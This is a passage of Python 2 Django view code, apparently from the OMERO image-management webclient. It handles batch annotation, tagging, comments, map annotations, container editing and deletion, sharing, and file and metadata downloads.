list(conn.getObjects("Plate", r.getlist('plate'))) or
list())
acquisitions = (
len(r.getlist('acquisition')) > 0 and
list(conn.getObjects(
"PlateAcquisition", r.getlist('acquisition'))) or
list())
shares = (len(r.getlist('share')) > 0 and
[conn.getShare(r.getlist('share')[0])] or list())
wells = (len(r.getlist('well')) > 0 and
list(conn.getObjects("Well", r.getlist('well'))) or list())
return {
'image': images, 'dataset': datasets, 'project': projects,
'screen': screens, 'plate': plates, 'acquisition': acquisitions,
'well': wells, 'share': shares}
def getIds(request):
"""
Used by forms to indicate the currently selected objects prepared above
"""
r = request.GET or request.POST
selected = {
'images': r.getlist('image'),
'datasets': r.getlist('dataset'),
'projects': r.getlist('project'),
'screens': r.getlist('screen'),
'plates': r.getlist('plate'),
'acquisitions': r.getlist('acquisition'),
'wells': r.getlist('well'),
'shares': r.getlist('share')}
return selected
@login_required()
@render_response()
def batch_annotate(request, conn=None, **kwargs):
"""
This page gives a form for batch annotation.
Local File form and Comment form are loaded. Other forms are loaded via
AJAX
"""
objs = getObjects(request, conn)
# get groups for selected objects - setGroup() and create links
obj_ids = []
obj_labels = []
groupIds = set()
annotationBlocked = False
for key in objs:
obj_ids += ["%s=%s" % (key, o.id) for o in objs[key]]
for o in objs[key]:
groupIds.add(o.getDetails().group.id.val)
if not o.canAnnotate():
annotationBlocked = ("Can't add annotations because you don't"
" have permissions")
obj_labels.append({
'type': key.title(), 'id': o.id, 'name': o.getName()})
obj_string = "&".join(obj_ids)
link_string = "|".join(obj_ids).replace("=", "-")
if len(groupIds) == 0:
# No supported objects found.
# If multiple tags / tagsets selected, return placeholder
if (len(request.GET.getlist('tag')) > 0 or
len(request.GET.getlist('tagset')) > 0):
return HttpResponse("<h2>Can't batch annotate tags</h2>")
else:
return handlerInternalError(request, "No objects found")
groupId = list(groupIds)[0]
conn.SERVICE_OPTS.setOmeroGroup(groupId)
manager = BaseContainer(conn)
figScripts = manager.listFigureScripts(objs)
canExportAsJpg = manager.canExportAsJpg(request, objs)
filesetInfo = None
iids = []
if 'image' in objs and len(objs['image']) > 0:
iids = [i.getId() for i in objs['image']]
if len(iids) > 0:
filesetInfo = conn.getFilesetFilesInfo(iids)
archivedInfo = conn.getArchivedFilesInfo(iids)
filesetInfo['count'] += archivedInfo['count']
filesetInfo['size'] += archivedInfo['size']
context = {
'iids': iids,
'obj_string': obj_string,
'link_string': link_string,
'obj_labels': obj_labels,
'batch_ann': True,
'figScripts': figScripts,
'canExportAsJpg': canExportAsJpg,
'filesetInfo': filesetInfo,
'annotationBlocked': annotationBlocked,
'differentGroups': False}
if len(groupIds) > 1:
context['annotationBlocked'] = ("Can't add annotations because"
" objects are in different groups")
context['differentGroups'] = True # E.g. don't run scripts etc
context['canDownload'] = manager.canDownload(objs)
context['template'] = "webclient/annotations/batch_annotate.html"
context['webclient_path'] = reverse('webindex')
return context
@login_required()
@render_response()
def annotate_file(request, conn=None, **kwargs):
"""
    On 'POST', this handles attaching existing file-annotation(s) and/or
    uploading a new file to one or more objects.
    Otherwise it generates the form for choosing file-annotations & local
    files.
"""
oids = getObjects(request, conn)
selected = getIds(request)
initial = {
'selected': selected,
'images': oids['image'],
'datasets': oids['dataset'],
'projects': oids['project'],
'screens': oids['screen'],
'plates': oids['plate'],
'acquisitions': oids['acquisition'],
'wells': oids['well']}
# Use the first object we find to set context (assume all objects are in
# same group!)
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
obj_count = sum([len(selected[types]) for types in selected])
# Get appropriate manager, either to list available Files to add to single
# object, or list ALL Files (multiple objects)
manager = None
if obj_count == 1:
for t in selected:
if len(selected[t]) > 0:
o_type = t[:-1] # "images" -> "image"
o_id = selected[t][0]
break
if o_type in ("dataset", "project", "image", "screen", "plate",
"acquisition", "well", "comment", "file", "tag",
"tagset"):
if o_type == 'tagset':
# TODO: this should be handled by the BaseContainer
o_type = 'tag'
kw = {}
if o_type is not None and o_id > 0:
kw[str(o_type)] = long(o_id)
try:
manager = BaseContainer(conn, **kw)
except AttributeError, x:
return handlerInternalError(request, x)
if manager is not None:
files = manager.getFilesByObject()
else:
manager = BaseContainer(conn)
for dtype, objs in oids.items():
if len(objs) > 0:
# NB: we only support a single data-type now. E.g. 'image' OR
# 'dataset' etc.
files = manager.getFilesByObject(
parent_type=dtype, parent_ids=[o.getId() for o in objs])
break
initial['files'] = files
if request.method == 'POST':
# handle form submission
form_file = FilesAnnotationForm(
initial=initial, data=request.POST.copy())
if form_file.is_valid():
# Link existing files...
files = form_file.cleaned_data['files']
added_files = []
if files is not None and len(files) > 0:
added_files = manager.createAnnotationsLinks(
'file', files, oids)
# upload new file
fileupload = ('annotation_file' in request.FILES and
request.FILES['annotation_file'] or None)
if fileupload is not None and fileupload != "":
newFileId = manager.createFileAnnotations(
fileupload, oids)
added_files.append(newFileId)
return JsonResponse({'fileIds': added_files})
else:
return HttpResponse(form_file.errors)
else:
form_file = FilesAnnotationForm(initial=initial)
context = {'form_file': form_file}
template = "webclient/annotations/files_form.html"
context['template'] = template
return context
@login_required()
@render_response()
def annotate_rating(request, conn=None, **kwargs):
"""
Handle adding Rating to one or more objects
"""
rating = getIntOrDefault(request, 'rating', 0)
oids = getObjects(request, conn)
# add / update rating
for otype, objs in oids.items():
for o in objs:
o.setRating(rating)
    # simply report success
return JsonResponse({'success': True})
@login_required()
@render_response()
def annotate_comment(request, conn=None, **kwargs):
""" Handle adding Comments to one or more objects
Unbound instance of Comment form not available.
If the form has been submitted, a bound instance of the form
is created using request.POST"""
if request.method != 'POST':
raise Http404("Unbound instance of form not available.")
oids = getObjects(request, conn)
selected = getIds(request)
initial = {
'selected': selected,
'images': oids['image'],
'datasets': oids['dataset'],
'projects': oids['project'],
'screens': oids['screen'],
'plates': oids['plate'],
'acquisitions': oids['acquisition'],
'wells': oids['well'],
'shares': oids['share']}
    # Use the first object we find to set context (assume all objects are in
    # the same group!). This does not apply to shares
if len(oids['share']) < 1:
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(
obs[0].getDetails().group.id.val)
break
# Handle form submission...
form_multi = CommentAnnotationForm(initial=initial,
data=request.POST.copy())
if form_multi.is_valid():
# In each case below, we pass the {'object_type': [ids]} map
content = form_multi.cleaned_data['comment']
if content is not None and content != "":
if oids['share'] is not None and len(oids['share']) > 0:
sid = oids['share'][0].id
manager = BaseShare(conn, sid)
host = "%s?server=%i" % (
request.build_absolute_uri(
reverse("load_template", args=["public"])),
int(conn.server_id))
textAnn = manager.addComment(host, content)
# For shares we need to return html for display...
context = {
'tann': textAnn,
'added_by': conn.getUserId(),
'template': "webclient/annotations/comment.html"}
else:
# ...otherwise Comments are re-loaded by AJAX json
# so we don't *need* to return anything
manager = BaseContainer(conn)
annId = manager.createCommentAnnotations(
content, oids)
context = {
'annId': annId,
'added_by': conn.getUserId()}
return context
else:
# TODO: handle invalid form error
return HttpResponse(str(form_multi.errors))
@login_required()
@render_response()
def annotate_map(request, conn=None, **kwargs):
"""
Handle adding Map Annotations to one or more objects
POST data "mapAnnotation" should be list of ['key':'value'] pairs.
"""
if request.method != 'POST':
raise Http404("Need to POST map annotation data as list of"
" ['key', 'value'] pairs")
oids = getObjects(request, conn)
    # Use the first object we find to set context (assume all objects are in
    # the same group!)
    # This does not apply to shares
if len(oids['share']) < 1:
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(
obs[0].getDetails().group.id.val)
break
data = request.POST.get('mapAnnotation')
data = json.loads(data)
annId = request.POST.get('annId')
# Create a new annotation
if annId is None and len(data) > 0:
ann = omero.gateway.MapAnnotationWrapper(conn)
ann.setValue(data)
ann.setNs(omero.constants.metadata.NSCLIENTMAPANNOTATION)
ann.save()
for k, objs in oids.items():
for obj in objs:
obj.linkAnnotation(ann)
annId = ann.getId()
# Or update existing annotation
elif annId is not None:
ann = conn.getObject("MapAnnotation", annId)
if len(data) > 0:
ann.setValue(data)
ann.save()
annId = ann.getId()
else:
# Delete if no data
handle = conn.deleteObjects('/Annotation', [annId])
try:
conn._waitOnCmd(handle)
finally:
handle.close()
annId = None
return {"annId": annId}
@login_required()
@render_response()
def marshal_tagging_form_data(request, conn=None, **kwargs):
"""
Provides json data to ome.tagging_form.js
"""
group = get_long_or_default(request, 'group', -1)
conn.SERVICE_OPTS.setOmeroGroup(str(group))
try:
offset = int(request.GET.get('offset'))
limit = int(request.GET.get('limit', 1000))
except:
offset = limit = None
jsonmode = request.GET.get('jsonmode')
if jsonmode == 'tagcount':
tag_count = conn.getTagCount()
return dict(tag_count=tag_count)
manager = BaseContainer(conn)
manager.loadTagsRecursive(eid=-1, offset=offset, limit=limit)
all_tags = manager.tags_recursive
all_tags_owners = manager.tags_recursive_owners
if jsonmode == 'tags':
# send tag information without descriptions
r = list((i, t, o, s) for i, d, t, o, s in all_tags)
return r
elif jsonmode == 'desc':
# send descriptions for tags
return dict((i, d) for i, d, t, o, s in all_tags)
elif jsonmode == 'owners':
# send owner information
return all_tags_owners
return HttpResponse()
@login_required()
@render_response()
def annotate_tags(request, conn=None, **kwargs):
"""
This handles creation AND submission of Tags form, adding new AND/OR
existing tags to one or more objects
"""
oids = getObjects(request, conn)
selected = getIds(request)
obj_count = sum([len(selected[types]) for types in selected])
# Get appropriate manager, either to list available Tags to add to single
# object, or list ALL Tags (multiple objects)
manager = None
self_id = conn.getEventContext().userId
tags = []
# Use the first object we find to set context (assume all objects are
# in same group!)
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(
obs[0].getDetails().group.id.val)
break
# Make a list of all current tags
# As would be on right column of tagging dialog...
taglist, users = tree.marshal_annotations(
conn,
project_ids=selected['projects'],
dataset_ids=selected['datasets'],
image_ids=selected['images'],
screen_ids=selected['screens'],
plate_ids=selected['plates'],
run_ids=selected['acquisitions'],
well_ids=selected['wells'],
ann_type='tag',
        # If we reach this limit, some tags may not be removed
limit=100000)
userMap = {}
for exp in users:
userMap[exp['id']] = exp
# For batch annotate, only include tags that user has added to all objects
if obj_count > 1:
# count my links
myLinkCount = {}
for t in taglist:
tid = t['id']
if tid not in myLinkCount:
myLinkCount[tid] = 0
if t['link']['owner']['id'] == self_id:
myLinkCount[tid] += 1
# filter
taglist = [t for t in taglist if myLinkCount[t['id']] == obj_count]
selected_tags = []
for tag in taglist:
linkOwnerId = tag['link']['owner']['id']
owner = userMap[linkOwnerId]
ownerName = "%s %s" % (
owner['firstName'],
owner['lastName'])
canDelete = True
created = tag['link']['date']
linkOwned = linkOwnerId == self_id
selected_tags.append(
(tag['id'], self_id, ownerName, canDelete, created, linkOwned))
# selected_tags is really a list of tag LINKS.
# May be several links per tag.id
selected_tags.sort(key=lambda x: x[0])
initial = {
'selected': selected,
'images': oids['image'],
'datasets': oids['dataset'],
'projects': oids['project'],
'screens': oids['screen'],
'plates': oids['plate'],
'acquisitions': oids['acquisition'],
'wells': oids['well']}
if request.method == 'POST':
# handle form submission
form_tags = TagsAnnotationForm(
initial=initial, data=request.POST.copy())
newtags_formset = NewTagsAnnotationFormSet(
prefix='newtags', data=request.POST.copy())
# Create new tags or Link existing tags...
if form_tags.is_valid() and newtags_formset.is_valid():
# filter down previously selected tags to the ones linked by
# current user
selected_tag_ids = [stag[0] for stag in selected_tags if stag[5]]
# Remove duplicates from tag IDs
selected_tag_ids = list(set(selected_tag_ids))
post_tags = form_tags.cleaned_data['tags']
tags = [tag for tag in post_tags
if tag not in selected_tag_ids]
removed = [tag for tag in selected_tag_ids
if tag not in post_tags]
manager = BaseContainer(conn)
if tags:
manager.createAnnotationsLinks(
'tag',
tags,
oids
)
new_tags = []
for form in newtags_formset.forms:
new_tags.append(manager.createTagAnnotations(
form.cleaned_data['tag'],
form.cleaned_data['description'],
oids,
tag_group_id=form.cleaned_data['tagset'],
))
# only remove Tags where the link is owned by self_id
for remove in removed:
tag_manager = BaseContainer(conn, tag=remove)
tag_manager.remove([
"%s-%s" % (dtype, obj.id)
for dtype, objs in oids.items()
for obj in objs], tag_owner_id=self_id)
return JsonResponse({'added': tags,
'removed': removed,
'new': new_tags})
else:
# TODO: handle invalid form error
return HttpResponse(str(form_tags.errors))
else:
form_tags = TagsAnnotationForm(initial=initial)
newtags_formset = NewTagsAnnotationFormSet(prefix='newtags')
context = {
'form_tags': form_tags,
'newtags_formset': newtags_formset,
'selected_tags': selected_tags,
}
template = "webclient/annotations/tags_form.html"
context['template'] = template
return context
@require_POST
@login_required()
@render_response()
def edit_channel_names(request, imageId, conn=None, **kwargs):
"""
Edit and save channel names
"""
image = conn.getObject("Image", imageId)
sizeC = image.getSizeC()
channelNames = {}
nameDict = {}
for i in range(sizeC):
cname = request.POST.get("channel%d" % i, None)
if cname is not None:
cname = smart_str(cname)[:255] # Truncate to fit in DB
channelNames["channel%d" % i] = cname
nameDict[i+1] = cname
# If the 'Apply to Dataset' button was used to submit...
if request.POST.get('confirm_apply', None) is not None:
# plate-123 OR dataset-234
parentId = request.POST.get('parentId', None)
if parentId is not None:
ptype = parentId.split("-")[0].title()
pid = long(parentId.split("-")[1])
counts = conn.setChannelNames(
ptype, [pid], nameDict, channelCount=sizeC)
else:
counts = conn.setChannelNames("Image", [image.getId()], nameDict)
rv = {"channelNames": channelNames}
if counts:
rv['imageCount'] = counts['imageCount']
rv['updateCount'] = counts['updateCount']
return rv
else:
return {"error": "No parent found to apply Channel Names"}
@login_required(setGroupContext=True)
@render_response()
def manage_action_containers(request, action, o_type=None, o_id=None,
conn=None, **kwargs):
"""
Handles many different actions on various objects.
@param action: "addnewcontainer", (creates a new Project, Dataset,
Screen), "editname", "savename", "editdescription",
"savedescription", (used as GET and POST for in-line
editing),
"removefromshare", (tree P/D/I moving etc)
"delete", "deletemany" (delete objects)
"remove" (remove tag/comment from object)
@param o_type: "dataset", "project", "image", "screen", "plate",
"acquisition", "well","comment", "file", "tag",
"tagset","share", "sharecomment"
"""
template = None
manager = None
if o_type in ("dataset", "project", "image", "screen", "plate",
"acquisition", "well", "comment", "file", "tag", "tagset"):
kw = {}
if o_type is not None and o_id > 0:
kw[str(o_type)] = long(o_id)
try:
manager = BaseContainer(conn, **kw)
except AttributeError, x:
return handlerInternalError(request, x)
elif o_type in ("share", "sharecomment", "chat"):
manager = BaseShare(conn, o_id)
else:
manager = BaseContainer(conn)
form = None
if action == 'addnewcontainer':
# Used within the jsTree to add a new Project, Dataset, Tag,
# Tagset etc under a specified parent OR top-level
if not request.method == 'POST':
return HttpResponseRedirect(reverse("manage_action_containers",
args=["edit", o_type, o_id]))
if o_type == "project" and hasattr(manager, o_type) and o_id > 0:
# If Parent o_type is 'project'...
form = ContainerForm(data=request.POST.copy())
if form.is_valid():
logger.debug(
"Create new in %s: %s" % (o_type, str(form.cleaned_data)))
name = form.cleaned_data['name']
description = form.cleaned_data['description']
oid = manager.createDataset(name, description)
rdict = {'bad': 'false', 'id': oid}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.iteritems():
d.update({e[0]: unicode(e[1])})
rdict = {'bad': 'true', 'errs': d}
return JsonResponse(rdict)
elif o_type == "tagset" and o_id > 0:
form = ContainerForm(data=request.POST.copy())
if form.is_valid():
name = form.cleaned_data['name']
description = form.cleaned_data['description']
oid = manager.createTag(name, description)
rdict = {'bad': 'false', 'id': oid}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.iteritems():
d.update({e[0]: unicode(e[1])})
rdict = {'bad': 'true', 'errs': d}
return JsonResponse(rdict)
elif request.POST.get('folder_type') in ("project", "screen",
"dataset", "tag", "tagset"):
# No parent specified. We can create orphaned 'project', 'dataset'
# etc.
form = ContainerForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Create new: %s" % (str(form.cleaned_data)))
name = form.cleaned_data['name']
description = form.cleaned_data['description']
folder_type = request.POST.get('folder_type')
if folder_type == "dataset":
oid = manager.createDataset(
name, description,
img_ids=request.POST.getlist('image', None))
else:
# lookup method, E.g. createTag, createProject etc.
oid = getattr(manager, "create" +
folder_type.capitalize())(name, description)
rdict = {'bad': 'false', 'id': oid}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.iteritems():
d.update({e[0]: unicode(e[1])})
rdict = {'bad': 'true', 'errs': d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == 'add':
template = "webclient/public/share_form.html"
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
if o_type == "share":
img_ids = request.GET.getlist('image',
request.POST.getlist('image'))
images_to_share = list(conn.getObjects("Image", img_ids))
if request.method == 'POST':
form = BasketShareForm(
initial={'experimenters': experimenters,
'images': images_to_share},
data=request.POST.copy())
if form.is_valid():
images = form.cleaned_data['image']
message = form.cleaned_data['message']
expiration = form.cleaned_data['expiration']
members = form.cleaned_data['members']
# guests = request.POST['guests']
enable = form.cleaned_data['enable']
host = "%s?server=%i" % (request.build_absolute_uri(
reverse("load_template", args=["public"])),
int(conn.server_id))
shareId = manager.createShare(
host, images, message, members, enable, expiration)
return HttpResponse("shareId:%s" % shareId)
else:
initial = {
'experimenters': experimenters,
'images': images_to_share,
'enable': True,
'selected': request.GET.getlist('image')
}
form = BasketShareForm(initial=initial)
template = "webclient/public/share_form.html"
context = {'manager': manager, 'form': form}
elif action == 'edit':
# form for editing an Object. E.g. Project etc. TODO: not used now?
if o_type == "share" and o_id > 0:
template = "webclient/public/share_form.html"
manager.getMembers(o_id)
manager.getComments(o_id)
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
initial = {
'message': manager.share.message,
'expiration': "",
'shareMembers': manager.membersInShare,
'enable': manager.share.active,
'experimenters': experimenters}
if manager.share.getExpireDate() is not None:
initial['expiration'] = \
manager.share.getExpireDate().strftime("%Y-%m-%d")
form = ShareForm(initial=initial) # 'guests':share.guestsInShare,
context = {'manager': manager, 'form': form}
elif hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/data/container_form.html"
form = ContainerForm(
initial={'name': obj.name, 'description': obj.description})
context = {'manager': manager, 'form': form}
elif action == 'save':
# Handles submission of the 'edit' form above. TODO: not used now?
if not request.method == 'POST':
return HttpResponseRedirect(reverse("manage_action_containers",
args=["edit", o_type, o_id]))
if o_type == "share":
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
form = ShareForm(initial={'experimenters': experimenters},
data=request.POST.copy())
if form.is_valid():
logger.debug("Update share: %s" % (str(form.cleaned_data)))
message = form.cleaned_data['message']
expiration = form.cleaned_data['expiration']
members = form.cleaned_data['members']
# guests = request.POST['guests']
enable = form.cleaned_data['enable']
host = "%s?server=%i" % (request.build_absolute_uri(
reverse("load_template", args=["public"])),
int(conn.server_id))
manager.updateShareOrDiscussion(
host, message, members, enable, expiration)
r = "enable" if enable else "disable"
return HttpResponse(r)
else:
template = "webclient/public/share_form.html"
context = {'share': manager, 'form': form}
else:
return HttpResponseServerError("Object does not exist")
elif action == 'editname':
# start editing 'name' in-line
if hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/ajax_form/container_form_ajax.html"
if o_type == "tag":
txtValue = obj.textValue
else:
txtValue = obj.getName()
form = ContainerNameForm(initial={'name': txtValue})
context = {'manager': manager, 'form': form}
else:
return HttpResponseServerError("Object does not exist")
elif action == 'savename':
# Save name edit in-line
if not request.method == 'POST':
return HttpResponseRedirect(reverse("manage_action_containers",
args=["edit", o_type, o_id]))
if hasattr(manager, o_type) and o_id > 0:
form = ContainerNameForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Update name form:" + str(form.cleaned_data))
name = form.cleaned_data['name']
rdict = {'bad': 'false', 'o_type': o_type}
manager.updateName(o_type, name)
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.iteritems():
d.update({e[0]: unicode(e[1])})
rdict = {'bad': 'true', 'errs': d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == 'editdescription':
# start editing description in-line
if hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/ajax_form/container_form_ajax.html"
form = ContainerDescriptionForm(
initial={'description': obj.description})
context = {'manager': manager, 'form': form}
else:
return HttpResponseServerError("Object does not exist")
elif action == 'savedescription':
# Save editing of description in-line
if not request.method == 'POST':
return HttpResponseServerError(
"Action '%s' on the '%s' id:%s cannot be complited"
% (action, o_type, o_id))
if hasattr(manager, o_type) and o_id > 0:
form = ContainerDescriptionForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Update name form:" + str(form.cleaned_data))
description = form.cleaned_data['description']
manager.updateDescription(o_type, description)
rdict = {'bad': 'false'}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.iteritems():
d.update({e[0]: unicode(e[1])})
rdict = {'bad': 'true', 'errs': d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == 'remove':
# Handles removal of comment, tag from
# Object etc.
# E.g. image-123 or image-1|image-2
parents = request.POST['parent']
try:
manager.remove(parents.split('|'))
except Exception, x:
logger.error(traceback.format_exc())
rdict = {'bad': 'true', 'errs': str(x)}
return JsonResponse(rdict)
rdict = {'bad': 'false'}
return JsonResponse(rdict)
elif action == 'removefromshare':
image_id = request.POST.get('source')
try:
manager.removeImage(image_id)
except Exception, x:
logger.error(traceback.format_exc())
rdict = {'bad': 'true', 'errs': str(x)}
return JsonResponse(rdict)
rdict = {'bad': 'false'}
return JsonResponse(rdict)
elif action == 'delete':
# Handles delete of a file attached to object.
child = toBoolean(request.POST.get('child'))
anns = toBoolean(request.POST.get('anns'))
try:
handle = manager.deleteItem(child, anns)
request.session['callback'][str(handle)] = {
'job_type': 'delete',
'delmany': False,
'did': o_id,
'dtype': o_type,
'status': 'in progress',
'error': 0,
'dreport': _formatReport(handle),
'start_time': datetime.datetime.now()}
request.session.modified = True
except Exception, x:
logger.error(
'Failed to delete: %r' % {'did': o_id, 'dtype': o_type},
exc_info=True)
rdict = {'bad': 'true', 'errs': str(x)}
else:
rdict = {'bad': 'false'}
return JsonResponse(rdict)
elif action == 'deletemany':
# Handles multi-delete from jsTree.
object_ids = {
'Image': request.POST.getlist('image'),
'Dataset': request.POST.getlist('dataset'),
'Project': request.POST.getlist('project'),
'Annotation': request.POST.getlist('tag'),
'Screen': request.POST.getlist('screen'),
'Plate': request.POST.getlist('plate'),
'Well': request.POST.getlist('well'),
'PlateAcquisition': request.POST.getlist('acquisition')}
child = toBoolean(request.POST.get('child'))
anns = toBoolean(request.POST.get('anns'))
logger.debug(
"Delete many: child? %s anns? %s object_ids %s"
% (child, anns, object_ids))
try:
for key, ids in object_ids.iteritems():
if ids is not None and len(ids) > 0:
handle = manager.deleteObjects(key, ids, child, anns)
if key == "PlateAcquisition":
key = "Plate Run" # for nicer user message
dMap = {
'job_type': 'delete',
'start_time': datetime.datetime.now(),
'status': 'in progress',
'error': 0,
'dreport': _formatReport(handle),
'dtype': key}
if len(ids) > 1:
dMap['delmany'] = len(ids)
dMap['did'] = ids
else:
dMap['delmany'] = False
dMap['did'] = ids[0]
request.session['callback'][str(handle)] = dMap
request.session.modified = True
except Exception, x:
logger.error(
'Failed to delete: %r' % {'did': ids, 'dtype': key},
exc_info=True)
# Ajax error handling will allow user to submit bug report
raise
else:
rdict = {'bad': 'false'}
return JsonResponse(rdict)
context['template'] = template
return context
@login_required(doConnectionCleanup=False)
def get_original_file(request, fileId, download=False, conn=None, **kwargs):
"""
Returns the specified original file as an http response. Used for
displaying text or png/jpeg etc files in browser
"""
# May be viewing results of a script run in a different group.
conn.SERVICE_OPTS.setOmeroGroup(-1)
orig_file = conn.getObject("OriginalFile", fileId)
if orig_file is None:
return handlerInternalError(
request, "Original File does not exists (id:%s)." % (fileId))
rsp = ConnCleaningHttpResponse(
orig_file.getFileInChunks(buf=settings.CHUNK_SIZE))
rsp.conn = conn
mimetype = orig_file.mimetype
if mimetype == "text/x-python":
mimetype = "text/plain" # allows display in browser
rsp['Content-Type'] = mimetype
rsp['Content-Length'] = orig_file.getSize()
if download:
downloadName = orig_file.name.replace(" ", "_")
downloadName = downloadName.replace(",", ".")
rsp['Content-Disposition'] = 'attachment; filename=%s' % downloadName
return rsp
@login_required()
def image_as_map(request, imageId, conn=None, **kwargs):
"""
Converts OMERO image into mrc.map file (using tiltpicker utils) and
returns the file
"""
from omero_ext.tiltpicker.pyami import mrc
from numpy import dstack, zeros, int8
image = conn.getObject("Image", imageId)
if image is None:
message = "Image ID %s not found in image_as_map" % imageId
logger.error(message)
return handlerInternalError(request, message)
imageName = image.getName()
downloadName = (imageName.endswith(".map") and imageName or
"%s.map" % imageName)
pixels = image.getPrimaryPixels()
# get a list of numpy planes and make stack
zctList = [(z, 0, 0) for z in range(image.getSizeZ())]
npList = list(pixels.getPlanes(zctList))
npStack = dstack(npList)
logger.info(
"Numpy stack for image_as_map: dtype: %s, range %s-%s"
% (npStack.dtype.name, npStack.min(), npStack.max()))
# OAV only supports 'float' and 'int8'. Convert anything else to int8
if (pixels.getPixelsType().value != 'float' or
('8bit' in kwargs and kwargs['8bit'])):
        # scale from -127 -> 128 and convert to 8 bit integer
npStack = npStack - npStack.min() # start at 0
# range - 127 -> 128
npStack = (npStack * 255.0 / npStack.max()) - 127
a = zeros(npStack.shape, dtype=int8)
npStack = npStack.round(out=a)
if "maxSize" in kwargs and int(kwargs["maxSize"]) > 0:
sz = int(kwargs["maxSize"])
targetSize = sz * sz * sz
# if available, use scipy.ndimage to resize
if npStack.size > targetSize:
try:
import scipy.ndimage
from numpy import round
factor = float(targetSize) / npStack.size
factor = pow(factor, 1.0/3)
logger.info(
"Resizing numpy stack %s by factor of %s"
% (npStack.shape, factor))
npStack = round(
scipy.ndimage.interpolation.zoom(npStack, factor), 1)
except ImportError:
logger.info(
"Failed to import scipy.ndimage for interpolation of"
" 'image_as_map'. Full size: %s" % str(npStack.shape))
pass
header = {}
# Sometimes causes scaling issues in OAV.
# header["xlen"] = pixels.physicalSizeX * image.getSizeX()
# header["ylen"] = pixels.physicalSizeY * image.getSizeY()
# header["zlen"] = pixels.physicalSizeZ * image.getSizeZ()
# if header["xlen"] == 0 or header["ylen"] == 0 or header["zlen"] == 0:
# header = {}
# write mrc.map to temp file
import tempfile
temp = tempfile.NamedTemporaryFile(suffix='.map')
try:
mrc.write(npStack, temp.name, header)
logger.debug(
"download file: %r" % {'name': temp.name, 'size': temp.tell()})
originalFile_data = FileWrapper(temp)
rsp = HttpResponse(originalFile_data)
rsp['Content-Type'] = 'application/force-download'
# rsp['Content-Length'] = temp.tell()
rsp['Content-Length'] = os.path.getsize(temp.name)
rsp['Content-Disposition'] = 'attachment; filename=%s' % downloadName
temp.seek(0)
except Exception:
temp.close()
logger.error(traceback.format_exc())
return handlerInternalError(
request, "Cannot generate map (id:%s)." % (imageId))
return rsp
@login_required(doConnectionCleanup=False)
def download_annotation(request, annId, conn=None, **kwargs):
""" Returns the file annotation as an http response for download """
ann = conn.getObject("Annotation", annId)
if ann is None:
return handlerInternalError(
request, "Annotation does not exist (id:%s)." % (annId))
rsp = ConnCleaningHttpResponse(
ann.getFileInChunks(buf=settings.CHUNK_SIZE))
rsp.conn = conn
rsp['Content-Type'] = 'application/force-download'
rsp['Content-Length'] = ann.getFileSize()
rsp['Content-Disposition'] = ('attachment; filename=%s'
% (ann.getFileName().replace(" ", "_")))
return rsp
@login_required()
def download_orig_metadata(request, imageId, conn=None, **kwargs):
""" Downloads the 'Original Metadata' as a text file """
image = conn.getObject("Image", imageId)
if image is None:
raise Http404("No Image found with ID %s" % imageId)
om = image.loadOriginalMetadata()
txtLines = ["[Global Metadata]"]
txtLines.extend(["%s=%s" % (kv[0], kv[1]) for kv in om[1]])
txtLines.append("[Series Metadata]")
txtLines.extend(["%s=%s" % (kv[0], kv[1]) for kv in om[2]])
rspText = "\n".join(txtLines)
rsp = HttpResponse(rspText)
rsp['Content-Type'] = 'application/force-download'
rsp['Content-Length'] = len(rspText)
rsp['Content-Disposition'] = 'attachment; filename=Original_Metadata.txt'
return rsp
@login_required()
@render_response()
def download_placeholder(request, conn=None, **kwargs):
"""
Page displays a simple "Preparing download..." message and redirects to
the 'url'.
We construct the url and query string from request: 'url' and 'ids'.
"""
format = request.GET.get('format', None)
if format is not None:
download_url = reverse('download_as')
zipName = 'Export_as_%s' % format
else:
download_url = reverse('archived_files')
zipName = 'OriginalFileDownload'
targetIds = request.GET.get('ids') # E.g. image-1|image-2
defaultName = request.GET.get('name', zipName) # default zip name
defaultName = os.path.basename(defaultName) # remove path
if targetIds is None:
raise Http404("No IDs specified. E.g. ?ids=image-1|image-2")
ids = targetIds.split("|")
fileLists = []
fileCount = 0
# If we're downloading originals, list original files so user can
# download individual files.
if format is None:
imgIds = []
wellIds = []
for i in ids:
if i.split("-")[0] == "image":
imgIds.append(i.split("-")[1])
elif i.split("-")[0] == "well":
wellIds.append(i.split("-")[1])
images = []
# Get images...
if imgIds:
images = list(conn.getObjects("Image", imgIds))
if len(images) == 0:
raise Http404("No images found.")
# Have a list of files per fileset (or per image without fileset)
fsIds = set()
fileIds = set()
for image in images:
fs = image.getFileset()
if fs is not None:
# Make sure we've not processed this fileset before.
if fs.id in fsIds:
continue
fsIds.add(fs.id)
files = list(image.getImportedImageFiles())
fList = []
for f in files:
if f.id in fileIds:
continue
fileIds.add(f.id)
fList.append({'id': f.id,
'name': f.name,
'size': f.getSize()})
if len(fList) > 0:
fileLists.append(fList)
fileCount = sum([len(l) for l in fileLists])
else:
# E.g. JPEG/PNG - 1 file per image
fileCount = len(ids)
query = "&".join([i.replace("-", "=") for i in ids])
